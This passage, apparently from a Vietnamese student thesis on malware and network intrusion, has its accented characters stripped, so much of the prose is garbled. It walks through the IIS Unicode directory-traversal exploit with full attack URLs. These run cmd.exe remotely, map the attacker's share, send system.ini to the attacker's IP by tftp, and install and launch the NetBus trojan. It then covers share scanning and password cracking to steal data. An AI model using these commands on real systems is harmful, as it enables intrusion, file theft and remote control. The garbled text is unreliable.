ngoi th mc web bng li Unicode ch cho php ngi ta c quyn truy cp h thng l IUSR_machinename cn truy cp vo th mc winnt\repair, ni lu tr cc file SAM v cng quan trng, ch c th thc hin vi quyn truy cp l Administrator. lm c iu ny, ngi ta cn upload mt s cng c h tr vic thm d t xa. V server FTP khng cho php ngi s dng upload file ln h thng nn ta phi s dng phng php khc. iu ny c th thc hin thng qua cc bc nh sau:

Sinh vin:V Th Thu Hng - Lp CT 702 - Trng H DLHP

24

Tm hiu phn mm ph hoi v cc gii php xm nhp mng dng ring c kt ni Internet Bc 1: Chia s mt a trn my ca mnh, C: chng hn, vi quyn truy nhp l Full v khng c pass bo v. Gi s tn chia s (Share name) c t l My Disk. Bc 2: S dng lnh net use trn IIS nh x (map) My Disk (tc l a C: trn my ca mnh) v thnh mt a mi trn my ch pha ch, gi s l G: %c1%1c../winnt/system32/cmd.exe?/c+net http://www.iisaffected.com/scripts/.. +use+G:+\\203.160.1.94\MyDisk

(Coi nh my mnh c a ch IP l 203.160.1.94) Ta c th kim tra xem lnh ny c c thc thi v c thnh cng hay khng bng cch dng lnh DIR: %c1%1c../winnt/system32/cmd.exe?/c+dir+g:\ Nu ni dung m trnh duyt lit k trng vi ni dung a C: trn my ca mnh th lnh net use thnh cng v trn my ch c mt a G:, mi thay i trn G: my ch u l thay i a C: ca mnh v ngc li. Bc 3: Ngi ta cn tm mt chng trnh iu khin my tnh t xa nh WinVNC (Virtual Network Computing) ca AT&T Laboratories Cambrridge (http://www.uk.reseach.att.com/vnc), PC Anywhere ca Symantec (http://www.symantec.com) hay cc chng trnh nga thnh Trojan, chp n vo C: ( G:\ trn my ch) v dng trnh duyt copy ln a cng thc s ca server. Gi s trn C: ca ngi ta c Trojan netbus 1.7 vi thnh phn server l Patch.exe, ta s thc hin lnh sau trnh duyt: http://www.iisaffected.com/scripts/.. %c1%1c../winnt/system32/cmd.exe?/c+copy+g:\Patch.exe+c:\Patch.exe Bc 4: Tt nhin ta khng mun thc s chia s a cho tt c mi ngi xem v ton quyn s dng nh vy. Gi y ta s dng lnh net use G:/delete trn server ngt lin kt n C: ca mnh: http://www.iisaffected.com/scripts/.. %c1%1c../winnt/system32/cmd.exe?/c+net+use+g:+\delete. Sinh vin:V Th Thu Hng - Lp CT 702 - Trng H DLHP 25 http://www.iisaffected.com/scripts/..

Tm hiu phn mm ph hoi v cc gii php xm nhp mng dng ring c kt ni Internet Tt hn na, ta nn b vic share a C: m bo an ton, nu khng mt hacker khc c th qut chia s v tm chia s ca ngi ta, t ch ng kt ni ph hoi my ngi ta. Bc 5: Chy thnh phn server ca chng trnh iu khin t xa trn my ch thnh phn client trn my ca ta, kt ni vo v iu khin my ch. Phng php ny l kh thi. Tuy nhin, n khng hot ng trn Windows 2000 v IIS 5.0. L do l ch phn quyn trong Windows 2000 cht ch hn Windows NT 4.0. Trong trng hp ny, ta s dng mt v kh khc, chnh l TFTP trnh by trn. Ngi ta cn n mt chng trnh TFTP server chy trn my ca mnh v s dng TFTP client trn h thng ch connect v chuyn file. y ngi ta s dng chng trnh TFTPD32, phin bn 1.2 ca Philippe Jounin. TFTPD32 giao tip thng qua cng TCP 69. By gi, ta chy TFTP client trn my ch v s dng n download, upload file mt cch d dng. Theo ngm nh l file tftp.exe ci t ti th mc \Winnt\system32\ ngi ta c th s dng trc tip lnh Put v Get ca tftp download hay upload file, v d lnh: http://www.iisaffected.com/scripts/.. %c1%1c../winnt/system32/cmd.exe?/c+tftp+i+203.160.1.94+Put+c:\system.ini+c:\stolen\system.ini s thc hin vic download file system.ini trn my ch xung th mc c:\stolen\ trn my ca mnh, cn lnh: http://www.iisaffected.com/scripts/.. %c1%1c../winnt/system32/cmd.exe?/c+tftp+i+203.160.1.94+Get+c:\trojans\netbus1.7\patch.exe+c:\patch.exe server ca netbus 1.7, file patch.exe ln a C:\ trn my ch. Cui cng, ngi ta chy Trojan NetBus v iu khin my ch ci t IIS : http://www.iisaffected.com/scripts/.. %c1%1c../winnt/system32/cmd.exe?/c+c:\patch.exe Sinh vin:V Th Thu Hng - Lp CT 702 - Trng H DLHP s upload

26

Tm hiu phn mm ph hoi v cc gii php xm nhp mng dng ring c kt ni Internet

4.2 KT HP CNG C QUT TI NGUYN C CHIA S V CNG C B MT KHU Phn ny m t gii php kt hp cng c qut ti nguyn c chia s trn my mc tiu vi cng c b mt khu truy nhp my mc tiu nhm mc ch ly cp thng tin. Cng c qut ti nguyn c chia s. qut ti nguyn c chia s trn my mc tiu, trong v d ny, ngi ta dng phn mm WS_Ping ProPack vi cng c Scan. Nh vy s dng WS_Ping ProPack ta c th bit c a ch IP ca my cha ti nguyn . truy cp n ti nguyn , ngi ta c nhiu cch, v d c th dng dng lnh: Run\\<a ch IP>\<tn ti nguyn> xem ti nguyn c share hay khng ngi ta s dng cu lnh C:\net view <a ch IP> .Nu ti nguyn c chia s khng c mt khu th vic truy nhp c tin hnh bnh thng: net use < a bt k trn my ca bn > : < share ca nn nhn >. Nu ti nguyn c chia s vi mt khu th ta dng cng c b mt khu, nh s trnh by di y, b mt khu v truy nhp n ti nguyn theo mt khu b c - Passware Kit. Passware Kit khi phc tt c cc loi password cho tt c cc file ng dng vn phng ph bin nht th gii, bao gm Exel, Word, WinZip, Window XP/2000/NT, Access, Outlook, Quicken, WordPefect, VBA, 1-2-3, ACT, Paradox, Organizer, Schedule, WordPro v nhiu hn na Cc bc khi phc password cho ti liu Microsoft Office.

Sinh vin:V Th Thu Hng - Lp CT 702 - Trng H DLHP

27

Tm hiu phn mm ph hoi v cc gii php xm nhp mng dng ring c kt ni Internet khi phc password cho cc kiu khc bn hy la chn mt module khi phc khc trong bc 1: 1. Kch vo nt Start, sau kch vo Program, Passware, Office Key.

2. La chn Recover, hp hi thoi chn file s xut hin.

3. Chn file tm password. 4. Nhn nt Open bt u khi phc.

KT LUN

Sinh vin:V Th Thu Hng - Lp CT 702 - Trng H DLHP

28

Tm hiu phn mm ph hoi v cc gii php xm nhp mng dng ring c kt ni Internet

Sau khi nghin cu l thuyt, v c bn lun vn th hin c ni dung c bn m ti cp. Qua n ny, em hiu c phn no cch thc hot ng ca cc phn mm ph hoi v cc gii php xm nhp mng dng ring c kt ni Internet. Mc d c nhiu c gng nhng do Internet l mt vn v cng rng, thi gian ngn v trnh c hn nn n cn nhiu hn ch v cha gii quyt trn vn yu cu ti nu ra. Hng pht trin ti ca em trong tng lai l s khc phc cc hn ch ti ngy cng hon thin hn v to ra mt sn phm phn mm - mt cng c c ng dng trong cng ngh xm nhp mng ni ring v nn cng ngh thng tin ni chung.

Sinh vin:V Th Thu Hng - Lp CT 702 - Trng H DLHP

29

Tm hiu phn mm ph hoi v cc gii php xm nhp mng dng ring c kt ni Internet

CC TI LIU THAM KHO

[1]. Bo mt mng B quyt v gii php Nhm bin dch VN_Guide, NXB Thng K 2000 [2]. Technical Report 2002: Microsoft IIS 4.0, 5.0 extended Unicode Directory Traversal Vulnerability and Certification Effort_IRIA Tools [3]. Microsoft Security Bulletin (MS00-078) [4]. http://packetstorm.secuify.com [5]. http://www.tlsecurity.net [6]. http://www.securityfocus.com [7]. http://www.LostPassword.com [8]. http://www.ipswitch.com

Sinh vin:V Th Thu Hng - Lp CT 702 - Trng H DLHP

30